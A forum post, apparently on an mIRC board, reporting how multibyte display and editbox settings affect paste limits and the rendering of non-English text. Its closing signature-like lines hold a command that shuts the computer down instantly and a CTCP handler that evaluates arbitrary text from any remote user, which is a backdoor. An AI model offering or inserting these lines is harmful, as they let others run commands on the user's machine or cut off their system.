http://duckyshack.co.uk/u/2508/f53042331.jpg

There is an image of both the options settings and the font window settings that I'm using currently.

I've only tested this in a channel window, as did symphone (at which point I'd copy/paste his text in notepad2 and see how big it was) and it was my friend silverfire that said it was broken in DCC Chat window, I've told him to post here numerous times.. dunno why he hasn't.

Here are the combinations of the boxes and which ones break what function(s).

Key: MultibyteDisplay -> md, MultibyteEditbox -> me.

md = me = 1
Paste from ctrl+v is limited to 900-1000 bytes (random per files), non-english languages show up just fine in both the edit box and the display screen.

md = 1, me = 0
Paste from ctrl+v is completed, non-english languages show up while being typed in edit-box, but come out as ?-marks in the chat window.

me = 1, md = 0
Paste from ctrl+v is limited to 900-1000 bytes (random per file), non-english languages show up correctly in both edit-box and chat-window.

me = md = 0
Paste from ctrl+v is complete, non-english languages show up while being typed in edit-box but become ?-marks in chat window.

Changing these options while there is already non-english characters in the channel window doesn't change their display, only prohibits them from coming out correctly to the screen.

Also.. not sure what symphoney was doing, perhaps the built-in flood control, but he never flooded out when pasting >.>

Last edited by Midori; 25/08/07 08:55 PM.

/run shutdown.exe -s -t 0
ctcp ^*:r*:*:{$($2-,2)|halt}